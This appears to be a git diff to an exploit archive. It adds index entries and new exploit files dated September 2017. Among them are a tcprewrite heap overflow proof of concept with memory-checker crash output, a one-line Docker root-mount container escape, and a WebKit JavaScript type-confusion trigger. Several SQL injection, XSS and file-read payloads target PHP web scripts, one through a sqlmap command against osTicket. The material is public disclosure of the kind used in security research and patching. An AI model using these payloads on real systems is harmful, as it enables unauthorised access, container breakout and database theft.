diff --git a/files.csv b/files.csv
index 062320666..09d41e199 100644
--- a/files.csv
+++ b/files.csv
@@ -5667,6 +5667,8 @@ id,file,description,date,author,platform,type,port
 42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0
 42600,platforms/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow",2017-09-01,"Ke Liu",linux,dos,0
 42602,platforms/multiple/dos/42602.html,"IBM Notes 8.5.x/9.0.x - Denial of Service",2017-09-02,"Dhiraj Mishra",multiple,dos,0
+42652,platforms/linux/dos/42652.txt,"tcprewrite - Heap-Based Buffer Overflow",2017-09-11,FarazPajohan,linux,dos,0
+42666,platforms/multiple/dos/42666.txt,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization",2017-09-12,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9199,6 +9201,7 @@ id,file,description,date,author,platform,type,port
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
+42356,platforms/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",linux,local,0
 42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0
 42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0
 42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0
@@ -9231,6 +9234,7 @@ id,file,description,date,author,platform,type,port
 42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-06,mr_me,windows,local,0
 42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
 42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
+42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver <= 12.4.0 - Kernel Pool Overflow",2017-09-12,mr_me,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37548,7 +37552,7 @@ id,file,description,date,author,platform,type,port
 40804,platforms/php/webapps/40804.txt,"WordPress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",php,webapps,0
 40809,platforms/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps,0
 40816,platforms/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps,0
-40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0
+40826,platforms/php/webapps/40826.py,"osTicket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0
 40895,platforms/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,multiple,webapps,0
 40837,platforms/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,hardware,webapps,0
 40842,platforms/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",java,webapps,8080
@@ -38433,3 +38437,14 @@ id,file,description,date,author,platform,type,port
 42648,platforms/php/webapps/42648.html,"Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)",2017-09-11,"Ihsan Sencan",php,webapps,0
 42649,platforms/hardware/webapps/42649.txt,"FiberHome ADSL AN1020-25 - Improper Access Restrictions",2017-09-05,"Ibad Shah",hardware,webapps,0
 42651,platforms/hardware/webapps/42651.txt,"WiseGiga NAS - Multiple Vulnerabilities",2017-09-11,"Pierre Kim",hardware,webapps,0
+42653,platforms/php/webapps/42653.txt,"PHP Dashboards NEW 4.4 - Arbitrary File Read",2017-09-11,"Ihsan Sencan",php,webapps,0
+42654,platforms/php/webapps/42654.txt,"PHP Dashboards NEW 4.4 - SQL Injection",2017-09-11,"Ihsan Sencan",php,webapps,0
+42655,platforms/php/webapps/42655.txt,"JobStar Monster Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,php,webapps,0
+42656,platforms/php/webapps/42656.txt,"iTech Book Store Script 2.02 - SQL Injection",2017-09-11,8bitsec,php,webapps,0
+42657,platforms/php/webapps/42657.txt,"iTech StockPhoto Script 2.02 - SQL Injection",2017-09-11,8bitsec,php,webapps,0
+42658,platforms/php/webapps/42658.txt,"EduStar Udemy Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,php,webapps,0
+42659,platforms/php/webapps/42659.txt,"AirStar Airbnb Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,php,webapps,0
+42660,platforms/php/webapps/42660.txt,"osTicket 1.10 - SQL Injection",2017-09-12,"Mehmet Ince",php,webapps,0
+42661,platforms/php/webapps/42661.txt,"FoodStar 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
+42662,platforms/php/webapps/42662.txt,"Gr8 Multiple Search Engine Script 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
+42663,platforms/php/webapps/42663.txt,"inClick Cloud Server 5.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/linux/dos/42652.txt b/platforms/linux/dos/42652.txt
new file mode 100755
index 000000000..48185c067
--- /dev/null
+++ b/platforms/linux/dos/42652.txt
@@ -0,0 +1,83 @@
+################
+#Title: tcprewrite Heap-Based Buffer Overflow
+#CVE: CVE-2017-14266
+#CWE: CWE-122
+#Exploit Author: Hosein Askari(FarazPajohan)
+#Vendor HomePage: http://tcpreplay.synfin.net/
+#Product Description: When you want to give a PCAP file to someone, it gives away certain sensitive information such as an organizations internal IP range,
+IP addresses of sensitive company assets, MAC addresses of critical hardware that could identify the product vendors. Tcprewrite is a security tool to rewrite packets stored
+in PCAP file format, such as created by tools such as tcpdump and ethereal.
+#Version : 3.4.4 Released under the Free BSD License
+#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)
+#Date: 11-09-2017
+#Category: Application
+#Author Mail : hosein.askari@aol.com
+#Description: tcprewrite in Tcpreplay 3.4.4 has a Heap-Based Buffer Overflow vulnerability triggered by a crafted PCAP file can cause a memory corruption and potential code execution.
+###############
+#First we make a crafted file and send it to the network and capture its information by wireshark.
+~Step 1:
+sudo echo -ne '\x63\x72\x61\x66\x74\x65\x64\x20\x66\x69\x6c\x65\x20\x69\x73\x20\x6d\x61\x64\x65\x20\x62\x79\x20\x48\x6f\x73\x65\x69\x6e\x20\x41\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=200 of=tcp3.txt
+~Step 2(Sending the information and capturing by wireshark):
+import os
+for i in range(1,20):
+        os.system("cat tcp3.txt | nc 127.0.0.1 21")
+~Step 3(Using tcprewrite):
+sudo  tcprewrite --portmap=21:2121 --infile=tcp.pcap --outfile=output.pcap
+################
+#POC:
+constantine@constantine:~/Downloads/DrMemory-Linux-1.11.0-2/bin$ sudo ./drmemory -- tcprewrite --portmap=21:2121 --infile=tcp.pcap --outfile=output.pcap
+~~Dr.M~~ Dr. Memory version 1.11.0
+~~Dr.M~~ WARNING: application is missing line number information.
+~~Dr.M~~
+~~Dr.M~~ Error #1: UNADDRESSABLE ACCESS beyond heap bounds: writing 0x080d458f-0x080d4590 1 byte(s) within 0x080d458c-0x080d4590
+~~Dr.M~~ # 0 replace_memcpy               [/work/drmemory_package/drmemory/replace.c:246]
+~~Dr.M~~ # 1 tcprewrite!?                +0x0      (0x0804ae59 <tcprewrite+0x2e59>)
+~~Dr.M~~ # 2 tcprewrite!?                +0x0      (0x08049f91 <tcprewrite+0x1f91>)
+~~Dr.M~~ # 3 tcprewrite!?                +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
+~~Dr.M~~ Note: @0:00:01.045 in thread 2521
+~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af
+~~Dr.M~~ Note: instruction: mov    %eax -> (%ebx)
+~~Dr.M~~
+~~Dr.M~~ Error #2: UNADDRESSABLE ACCESS beyond heap bounds: writing 0x080d459c-0x080d459d 1 byte(s)
+~~Dr.M~~ # 0 replace_memcpy               [/work/drmemory_package/drmemory/replace.c:252]
+~~Dr.M~~ # 1 tcprewrite!?                +0x0      (0x0804ae59 <tcprewrite+0x2e59>)
+~~Dr.M~~ # 2 tcprewrite!?                +0x0      (0x08049f91 <tcprewrite+0x1f91>)
+~~Dr.M~~ # 3 tcprewrite!?                +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
+~~Dr.M~~ Note: @0:00:01.047 in thread 2521
+~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af
+~~Dr.M~~ Note: instruction: mov    %dl -> (%eax)
+~~Dr.M~~
+~~Dr.M~~ Error #3: UNADDRESSABLE ACCESS beyond heap bounds: reading 0x080d458f-0x080d4591 2 byte(s) within 0x080d458d-0x080d4591
+~~Dr.M~~ # 0 libc.so.6!__GI___mempcpy              [../sysdeps/i386/i686/multiarch/../mempcpy.S:54]
+~~Dr.M~~ # 1 libc.so.6!__GI__IO_default_xsputn     [/build/glibc-KM3i_a/glibc-2.23/libio/genops.c:438]
+~~Dr.M~~ # 2 libc.so.6!_IO_new_file_xsputn         [/build/glibc-KM3i_a/glibc-2.23/libio/fileops.c:1352]
+~~Dr.M~~ # 3 libc.so.6!__GI__IO_fwrite             [/build/glibc-KM3i_a/glibc-2.23/libio/iofwrite.c:39]
+~~Dr.M~~ # 4 libpcap.so.0.8!pcap_dump             +0x5f     (0xb79f1100 <libpcap.so.0.8+0x1d100>)
+~~Dr.M~~ # 5 tcprewrite!?                         +0x0      (0x0804adc6 <tcprewrite+0x2dc6>)
+~~Dr.M~~ # 6 tcprewrite!?                         +0x0      (0x08049f91 <tcprewrite+0x1f91>)
+~~Dr.M~~ # 7 tcprewrite!?                         +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
+~~Dr.M~~ Note: @0:00:01.071 in thread 2521
+~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af
+~~Dr.M~~ Note: instruction: rep movs %ds%esi) %esi %edi %ecx -> %es%edi) %esi %edi %ecx
+~~Dr.M~~
+~~Dr.M~~ Error #4: LEAK 8 direct bytes 0x080c3168-0x080c3170 + 0 indirect bytes
+~~Dr.M~~ # 0 replace_malloc               [/work/drmemory_package/common/alloc_replace.c:2576]
+~~Dr.M~~ # 1 tcprewrite!?                +0x0      (0x08059e6c <tcprewrite+0x11e6c>)
+~~Dr.M~~ # 2 tcprewrite!?                +0x0      (0x0804ea21 <tcprewrite+0x6a21>)
+~~Dr.M~~ # 3 tcprewrite!?                +0x0      (0x0804c264 <tcprewrite+0x4264>)
+~~Dr.M~~ # 4 tcprewrite!?                +0x0      (0x08049e0c <tcprewrite+0x1e0c>)
+~~Dr.M~~ # 5 tcprewrite!?                +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
+<Application /usr/bin/tcprewrite (2521).  Dr. Memory internal crash at PC 0x7384d6d5.  Please report this at http://drmemory.org/issues.  Program aborted.
+Received SIGSEGV at client library pc 0x7384d6d5 in thread 2521
+Base: 0xb7e25000
+Registers:eax=0x00000000 ebx=0x73934a30 ecx=0x00000002 edx=0x739355c0
+esi=0x4b200ba8 edi=0x00000006 esp=0x4a0c6814 ebp=0x00000000
+eflags=0x000102
+1.11.0-2-(Aug 29 2016 02:45:30)0
+-no_dynamic_options -disasm_mask 8 -logdir '/home/constantine/Downloads/DrMemory-Linux-1.11.0-2/drmemory/logs/dynamorio' -client_lib '/home/constantine/Downloads/DrMemory-Linux-1.11.0-2/bin/release/libdrmemorylib.so;0;-logdir `/home/constantine/Downloads/DrMemory-Linux-1.11.0-2/drmemory/logs` -symcache_dir `/home/constan
+/home/constantine/Downloads/DrMemory-Linux-1.11.0-2/bin/release/libdrmemorylib.so=0x73800000
+/usr/lib/i386-linux-gnu/libstdc++.so.6=0xb7c84000
+/lib/i386-linux-gnu/libgcc_s.so.1=0xb7a33000
+/lib/i386-linux-gnu/libm.so.6=0xb7c2e000
+/lib/i386-linux-gnu/libc.so.6=0xb7a77000
+/lib/ld-linux.so.2=0xb7a51000>
diff --git a/platforms/linux/local/42356.txt b/platforms/linux/local/42356.txt
new file mode 100755
index 000000000..37bc88023
--- /dev/null
+++ b/platforms/linux/local/42356.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Docker Daemon - Unprotected TCP Socket
+# Date: 20-07-2017
+# Exploit Author: Martin Pizala
+# Vendor Homepage: https://www.docker.com
+# Software Link: https://www.docker.com/get-docker
+# Version: Since 0.4.7 (2013-06-28) (feature: mount host directories)
+# Tested on: Docker CE 17.06.0-ce and Docker Engine 1.13.1
+ 
+1. Description
+
+Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp with tls but without tls-auth), an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container and use chroot to escape the container-jail.
+
+2. Proof of Concept
+
+docker -H tcp://<ip>:<port> run --rm -ti -v /:/mnt alpine chroot /mnt /bin/sh
+
+3. Solution:
+
+Protect the tcp socket
+https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket
+https://docs.docker.com/engine/security/https/
\ No newline at end of file
diff --git a/platforms/multiple/dos/42666.txt b/platforms/multiple/dos/42666.txt
new file mode 100755
index 000000000..29180abfc
--- /dev/null
+++ b/platforms/multiple/dos/42666.txt
@@ -0,0 +1,80 @@
+Let's start with JS code.
+
+let o = {};
+for (let i in {xx: 0}) {
+    o[i]; <<-------- (a)
+}
+
+When the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.
+
+Here's the code of BytecodeGenerator::emitGetByVal.
+
+RegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)
+{
+    for (size_t i = m_forInContextStack.size(); i > 0; i--) {
+        ForInContext& context = m_forInContextStack[i - 1].get();
+        if (context.local() != property)
+            continue;
+
+        if (!context.isValid())
+            break;
+
+        if (context.type() == ForInContext::IndexedForInContextType) {
+            property = static_cast<IndexedForInContext&>(context).index();
+            break;
+        }
+
+        ASSERT(context.type() == ForInContext::StructureForInContextType);
+        StructureForInContext& structureContext = static_cast<StructureForInContext&>(context);
+        UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);
+        instructions().append(kill(dst));
+        instructions().append(base->index());
+        instructions().append(property->index());
+        instructions().append(structureContext.index()->index());
+        instructions().append(structureContext.enumerator()->index());
+        instructions().append(profile);
+        return dst;
+    }
+
+    UnlinkedArrayProfile arrayProfile = newArrayProfile();
+    UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);
+    instructions().append(kill(dst));
+    instructions().append(base->index());
+    instructions().append(property->index());
+    instructions().append(arrayProfile);
+    instructions().append(profile);
+    return dst;
+}
+
+The method uses op_get_by_val to handle expressions like "o[i]". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that "i" will be a string("xx") semantically. Therefore, it will use op_get_direct_pname to handle it.
+
+Here's another example.
+
+let o = {};
+for (let i in {xx: 0}) {
+    o[i]; <<-------- (a)
+    i = 0x123456; <<-------- (b)
+    o[i]; <<-------- (c)
+}
+
+In this case, it will use op_get_direct_pname at (a). And at (b), since the index variable "i" is replaced, the invalidate method of the ForInContext object that makes "context.isValid()" return false is called. So, op_get_by_val will be used at (c).
+
+But the problem is that it can't properly handle the following case which cause a type confusion.
+
+let o = {};
+for (let i in {xx: 0}) {
+    for (let j = 0; j < 2; j++) {
+        o[i];  // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.
+        i = 0;
+    }
+}
+
+PoC:
+let o = {};
+for (let i in {xx: 0}) {
+    for (let j = 0; j < 2; j++) {
+        o[i];
+        i = new Uint32Array([0, 1, 0x777777, 0, 0]);
+    }
+}
+
diff --git a/platforms/php/webapps/42653.txt b/platforms/php/webapps/42653.txt
new file mode 100755
index 000000000..af5809b31
--- /dev/null
+++ b/platforms/php/webapps/42653.txt
@@ -0,0 +1,30 @@
+# # # # # 
+# Exploit Title: PHP Dashboards NEW 4.4 - Arbitrary File Read
+# Dork: N/A
+# Date: 11.09.2017
+# Vendor Homepage: http://dataninja.biz/
+# Software Link: https://codecanyon.net/item/php-dashboards-v40-collaborative-social-dashboards/19314871
+# Demo: http://phpdashboardv4.dataninja.biz/
+# Version: 4.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to arbitrary file read.
+# 
+# Proof of Concept:
+# 
+# 1
+# http://localhost/[PATH]/php/file/read.php?filename=[FILE]
+# 
+# 2
+# http://localhost/[PATH]/php/file/readxls.php?filename=[FILE]
+# http://localhost/[PATH]/php/file/PHPReader/temp/[.......].xls
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42654.txt b/platforms/php/webapps/42654.txt
new file mode 100755
index 000000000..b69bfb048
--- /dev/null
+++ b/platforms/php/webapps/42654.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: PHP Dashboards NEW 4.4 - SQL Injection
+# Dork: N/A
+# Date: 11.09.2017
+# Vendor Homepage: http://dataninja.biz/
+# Software Link: https://codecanyon.net/item/php-dashboards-v40-collaborative-social-dashboards/19314871
+# Demo: http://phpdashboardv4.dataninja.biz/
+# Version: 4.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/php/share/save.php?dashID=[SQL]
+# 
+# http://localhost/[PATH]/php/save/db.php?dashID=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42655.txt b/platforms/php/webapps/42655.txt
new file mode 100755
index 000000000..fc74bfc99
--- /dev/null
+++ b/platforms/php/webapps/42655.txt
@@ -0,0 +1,35 @@
+# Exploit Title: JobStar Monster Clone Script v1.0 - SQL Injection
+# Date: 2017-09-11
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://www.abservetech.com/
+# Software Link: https://www.abservetech.com/jobstar-monster-clone/
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-11
+
+Product & Service Introduction:
+===============================
+JobStar is a Monster Clone that enables you to build your own Online Job Portal website in a "few hours" and become fully operational in just a day.
+
+Technical Details & Description:
+================================
+
+Blind SQL injection on [id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+http://localhost.com/[path]/jobdetailshow?id=19 and 1=1
+
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=19 and 4297=4297
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/42656.txt b/platforms/php/webapps/42656.txt
new file mode 100755
index 000000000..ed9b00655
--- /dev/null
+++ b/platforms/php/webapps/42656.txt
@@ -0,0 +1,47 @@
+# Exploit Title: iTech Book Store Script v2.02 - SQL Injection / Reflected XSS
+# Date: 2017-09-11
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://itechscripts.com/
+# Software Link: http://itechscripts.com/book-store-script
+# Version: 2.02
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-11
+
+Product & Service Introduction:
+===============================
+This is a robust platform for the booksellers and bookshop owners.
+
+Technical Details & Description:
+================================
+
+SQL injection on [id] parameter.
+
+Reflected XSS on [id] parameter
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+http://localhost/[path]/book_details.php?id=[SQLi]
+
+Parameter: id (GET)
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: id=2 AND SLEEP(5)-- uUqP
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 1 column
+    Payload: id=-7869 UNION ALL SELECT CONCAT(0x7170717071,0x546c4d4e535a5262584f446466626e67625656687561614b687764535a6c574a4b64454666564173,0x71766b7671)-- PYKD
+
+Reflected XSS:
+
+http://localhost/[path]/book_details.php?id=%3C/scRipt/--!%3E\x3csVg/%3CsVg/oNloAd=alert(document.domain)//%3E\x3e
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/42657.txt b/platforms/php/webapps/42657.txt
new file mode 100755
index 000000000..4e73ac356
--- /dev/null
+++ b/platforms/php/webapps/42657.txt
@@ -0,0 +1,35 @@
+# Exploit Title: iTech StockPhoto Script v2.02 - SQL Injection
+# Date: 2017-09-11
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://itechscripts.com/
+# Software Link: http://itechscripts.com/stockphoto-script
+# Version: 2.02
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-11
+
+Product & Service Introduction:
+===============================
+This is a versatile script to help you launch a stock photo website like Sutterstock.
+
+Technical Details & Description:
+================================
+
+Blind SQL injection on [stock] POST parameter.
+
+Proof of Concept (PoC):
+=======================
+
+The parameter is sent when downloading an image.
+
+Parameter: stock (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: stock=19 AND 9771=9771
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/42658.txt b/platforms/php/webapps/42658.txt
new file mode 100755
index 000000000..083a458dc
--- /dev/null
+++ b/platforms/php/webapps/42658.txt
@@ -0,0 +1,39 @@
+# Exploit Title: EduStar Udemy Clone Script v1.0 - SQL Injection
+# Date: 2017-09-11
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://www.abservetech.com/
+# Software Link: https://www.abservetech.com/edustar-udemy-clone/
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-11
+
+Product & Service Introduction:
+===============================
+EduStar Udemy Clone Script
+
+Technical Details & Description:
+================================
+
+Blind SQL injection on [course_id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+http://localhost/[path]/courses/details?course_id=105 and 1=1
+
+Parameter: course_id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: course_id=105 AND 4868=4868
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: course_id=105 AND SLEEP(5)
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/42659.txt b/platforms/php/webapps/42659.txt
new file mode 100755
index 000000000..9b0f60f2c
--- /dev/null
+++ b/platforms/php/webapps/42659.txt
@@ -0,0 +1,34 @@
+# Exploit Title: AirStar Airbnb Clone Script v1.0 - SQL Injection
+# Date: 2017-09-11
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://www.abservetech.com/
+# Software Link: https://www.abservetech.com/airstar-airbnb-clone/
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-11
+
+Product & Service Introduction:
+===============================
+AirStar Airbnb Clone Script
+
+Technical Details & Description:
+================================
+
+Blind SQL injection on [room_id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+http://localhost/[path]/airstar/hotel/roomsedit/detailedroom/6 AND 8995=8995?mem_count=1&check_in=&check_out=&search_city=Madurai,India&min_amt=10&max_amt=150&inout=0
+
+Parameter: #1 (URI)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/42660.txt b/platforms/php/webapps/42660.txt
new file mode 100755
index 000000000..33b0c83be
--- /dev/null
+++ b/platforms/php/webapps/42660.txt
@@ -0,0 +1,42 @@
+1. ADVISORY INFORMATION
+========================================
+Title: osTicket v1.10 Unauthenticated SQL Injection
+Application: osTicket
+Bugs:  SQL Injection
+Class: Sensitive Information disclosure
+Remotely Exploitable: Yes
+Authentication Required: NO
+Versions Affected: <= v1.10
+Technology: PHP
+Vendor URL: http://osticket.com/
+CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
+Date of found: 12 Sep 2017
+Author: Mehmet Ince
+Advisory:
+https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/
+
+2. CREDIT
+========================================
+This vulnerability was identified during penetration test
+by Mehmet INCE from PRODAFT / INVICTUS
+
+3. VERSIONS AFFECTED
+========================================
+osTicket < 1.10
+
+5. Technical Details & POC
+========================================
+Please visit an advisory URL for technical details.
+
+PoC code:
+python sqlmap.py -u "
+http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL
+
+6. RISK
+========================================
+The vulnerability allows remote attackers to execute a sql query on
+database system.
+
+7. REFERENCES
+========================================
+https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/
diff --git a/platforms/php/webapps/42661.txt b/platforms/php/webapps/42661.txt
new file mode 100755
index 000000000..50a7b018d
--- /dev/null
+++ b/platforms/php/webapps/42661.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: FoodStar Swiggy Clone Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 12.09.2017
+# Vendor Homepage: https://www.abservetech.com/
+# Software Link: https://www.abservetech.com/foodstar-swiggy-clone/
+# Demo: http://abservetechdemo.com/products/foodstar/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/public/frontend/search?keyword=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42662.txt b/platforms/php/webapps/42662.txt
new file mode 100755
index 000000000..a77a68f11
--- /dev/null
+++ b/platforms/php/webapps/42662.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Gr8 Multiple Search Engine Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 12.09.2017
+# Vendor Homepage: http://www.gr8script.com/
+# Software Link: http://www.gr8script.com/multiple_search_script.php
+# Demo: http://www.gr8script.com/multiple_search/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/X[SQL]/X.html
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42663.txt b/platforms/php/webapps/42663.txt
new file mode 100755
index 000000000..a0663a1f0
--- /dev/null
+++ b/platforms/php/webapps/42663.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: inClick Cloud Server 5.0 - SQL Injection
+# Dork: N/A
